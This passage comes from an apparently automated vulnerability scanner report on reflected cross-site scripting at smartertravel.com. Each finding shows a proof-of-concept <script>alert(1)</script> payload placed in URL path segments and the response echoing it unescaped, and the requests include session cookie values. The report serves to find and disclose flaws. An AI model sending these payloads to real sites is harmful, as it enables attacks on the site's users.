Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/williamsburg-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb77c<script>alert(1)</script>6f9bd17193c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/williamsburg-travel-guide.htmlcb77c<script>alert(1)</script>6f9bd17193c HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:54:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:15 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:15 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:54:15 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/williamsburg-travel-guide.htmlcb77c<script>alert(1)</script>6f9bd17193c</p>
...[SNIP]...

2.87. http://www.smartertravel.com/us/sitemap.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /us/sitemap.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e59c<script>alert(1)</script>857771af433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us4e59c<script>alert(1)</script>857771af433/sitemap.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:37:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:37:44 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:37:44 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:37:44 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/us4e59c<script>alert(1)</script>857771af433/sitemap.php</p>
...[SNIP]...

2.88. http://www.smartertravel.com/us/sitemap.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /us/sitemap.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88c09<script>alert(1)</script>23dc95cb6cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/sitemap.php88c09<script>alert(1)</script>23dc95cb6cd HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:38:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:38:19 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:38:19 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:38:19 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/us/sitemap.php88c09<script>alert(1)</script>23dc95cb6cd</p>
...[SNIP]...

2.89. http://www.smartertravel.com/us/sitemap.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /us/sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34c72<script>alert(1)</script>7d3f5707cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/sitemap.php/34c72<script>alert(1)</script>7d3f5707cd4 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:34:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:34:43 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:34:43 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:34:43 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/us/sitemap.php/34c72<script>alert(1)</script>7d3f5707cd4</p>
...[SNIP]...

2.90. http://www.smartertravel.com/us/travel-discount-center.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /us/travel-discount-center.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 584eb<script>alert(1)</script>18027fc38b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us584eb<script>alert(1)</script>18027fc38b8/travel-discount-center.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:38:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:38:58 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:38:58 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:38:58 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/us584eb<script>alert(1)</script>18027fc38b8/travel-discount-center.php</p>
...[SNIP]...

2.91. http://www.smartertravel.com/us/travel-discount-center.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /us/travel-discount-center.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d151<script>alert(1)</script>709c0150cab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/travel-discount-center.php3d151<script>alert(1)</script>709c0150cab HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:39:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:39:06 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:39:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:39:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/us/travel-discount-center.php3d151<script>alert(1)</script>709c0150cab</p>
...[SNIP]...

2.92. http://www.smartertravel.com/us/travel-discount-center.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /us/travel-discount-center.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3ce5<script>alert(1)</script>7a760341aa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/travel-discount-center.php/d3ce5<script>alert(1)</script>7a760341aa1 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:35:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:35:25 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:35:25 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:35:25 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/us/travel-discount-center.php/d3ce5<script>alert(1)</script>7a760341aa1</p>
...[SNIP]...

2.93. http://www.smartertravel.com/vacation-package/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /vacation-package/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5389<script>alert(1)</script>e2200e16272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vacation-packagec5389<script>alert(1)</script>e2200e16272/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:29:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:30:25 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:30:25 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:30:25 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/vacation-packagec5389<script>alert(1)</script>e2200e16272/</p>
...[SNIP]...

2.94. http://www.smartertravel.com/weekend-getaways/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /weekend-getaways/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70445<script>alert(1)</script>6bbbcdd2d67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weekend-getaways70445<script>alert(1)</script>6bbbcdd2d67/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:32:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:32:41 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:32:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:32:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/weekend-getaways70445<script>alert(1)</script>6bbbcdd2d67/</p>
...[SNIP]...

2.95. http://www.smartertravel.com/xd_receiver.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /xd_receiver.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cea01<script>alert(1)</script>64c7de2e46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xd_receiver.htmcea01<script>alert(1)</script>64c7de2e46 HTTP/1.1
Host: www.smartertravel.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=2b84c806c55cdfa8206d64958de97ad2&extern=0&channel=http%3A%2F%2Fwww.smartertravel.com%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
